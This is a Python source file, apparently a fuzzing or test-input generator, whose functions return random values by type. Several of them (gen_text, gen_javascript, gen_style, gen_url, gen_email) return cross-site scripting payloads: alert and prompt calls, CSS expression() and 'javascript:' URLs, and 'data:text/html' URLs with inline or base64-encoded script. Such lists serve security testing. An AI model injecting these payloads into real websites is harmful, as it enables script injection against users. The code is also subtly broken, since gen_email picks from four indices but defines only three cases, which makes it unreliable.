123 lines
2.8 KiB
Python
123 lines
2.8 KiB
Python
|
from random import randint
|
||
|
|
||
|
|
||
|
def gen_text():
|
||
|
cases = {
|
||
|
0: lambda: 'alert(0)',
|
||
|
1: lambda: 'prompt\x600\x60',
|
||
|
2: lambda: '"confirm\x600\x60"',
|
||
|
3: lambda: 'window["alert"](0)',
|
||
|
4: lambda: 'window["prompt"](0)',
|
||
|
5: lambda: 'window["confirm"](0)',
|
||
|
6: lambda: '"alert\x600\x60"',
|
||
|
7: lambda: '"prompt\x600\x60"',
|
||
|
8: lambda: '"alert(1)"',
|
||
|
}
|
||
|
|
||
|
return cases[randint(0, 8)]()
|
||
|
|
||
|
|
||
|
def gen_boolean():
|
||
|
cases = {
|
||
|
0: lambda: 'true',
|
||
|
1: lambda: 'false',
|
||
|
2: lambda: '1',
|
||
|
3: lambda: '0',
|
||
|
4: lambda: 'null',
|
||
|
5: lambda: 'undefined',
|
||
|
6: lambda: '""',
|
||
|
7: lambda: '[]',
|
||
|
8: lambda: '{}',
|
||
|
}
|
||
|
|
||
|
return cases[randint(0, 8)]()
|
||
|
|
||
|
|
||
|
def gen_number():
|
||
|
cases = {
|
||
|
0: lambda: '0',
|
||
|
1: lambda: '1',
|
||
|
2: lambda: '0.1',
|
||
|
3: lambda: '1.1',
|
||
|
4: lambda: '0x1',
|
||
|
5: lambda: '0b1',
|
||
|
6: lambda: '0o1',
|
||
|
7: lambda: '1e1',
|
||
|
8: lambda: '1e-1',
|
||
|
}
|
||
|
|
||
|
return cases[randint(0, 8)]()
|
||
|
|
||
|
|
||
|
def gen_color():
|
||
|
cases = {
|
||
|
0: lambda: '#000000',
|
||
|
1: lambda: '#ffffff',
|
||
|
2: lambda: '#ff0000',
|
||
|
3: lambda: '#00ff00',
|
||
|
4: lambda: '#0000ff',
|
||
|
5: lambda: '#ffff00',
|
||
|
6: lambda: '#00ffff',
|
||
|
7: lambda: '#ff00ff',
|
||
|
8: lambda: '#c0c0c0',
|
||
|
}
|
||
|
|
||
|
return cases[randint(0, 8)]()
|
||
|
|
||
|
|
||
|
def gen_javascript():
|
||
|
cases = {
|
||
|
0: lambda: 'alert(0)',
|
||
|
1: lambda: 'prompt\x600\x60',
|
||
|
2: lambda: '"confirm\x600\x60"',
|
||
|
3: lambda: 'window["alert"](0)',
|
||
|
4: lambda: 'window["prompt"](0)',
|
||
|
5: lambda: 'window["confirm"](0)',
|
||
|
6: lambda: '"alert\x600\x60"',
|
||
|
7: lambda: '"prompt\x600\x60"',
|
||
|
8: lambda: '"alert(1)"',
|
||
|
9: lambda: 'console.log(alert(1))//',
|
||
|
10: lambda: 'console.log(alert(1))/*',
|
||
|
11: lambda: '{1:alert(1)}',
|
||
|
}
|
||
|
|
||
|
return cases[randint(0, 11)]()
|
||
|
|
||
|
|
||
|
def gen_style():
|
||
|
# xss via style
|
||
|
cases = {
|
||
|
0: lambda: 'background-image:url("javascript:alert(1)")',
|
||
|
1: lambda: 'expression(alert(1))',
|
||
|
2: lambda: 'expression\x600\x60',
|
||
|
}
|
||
|
|
||
|
return cases[randint(0, 2)]()
|
||
|
|
||
|
|
||
|
def gen_url():
|
||
|
# xss via url
|
||
|
cases = {
|
||
|
0: lambda: 'javascript:alert(1)',
|
||
|
1: lambda: 'data:text/html,<script>alert(1)</script>',
|
||
|
2: lambda: 'data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==',
|
||
|
3: lambda: 'data:text/html,<script>alert\x600\x60</script>',
|
||
|
}
|
||
|
|
||
|
return cases[randint(0, 3)]()
|
||
|
|
||
|
|
||
|
def gen_email():
|
||
|
# xss via email
|
||
|
cases = {
|
||
|
0: lambda: '@javascript:alert(1)',
|
||
|
1: lambda: 'javascript:alert(1)@',
|
||
|
2: lambda: '@javascript:alert\x600\x60',
|
||
|
}
|
||
|
|
||
|
return cases[randint(0, 3)]()
|
||
|
|
||
|
|
||
|
def gen_date():
|
||
|
return ''
|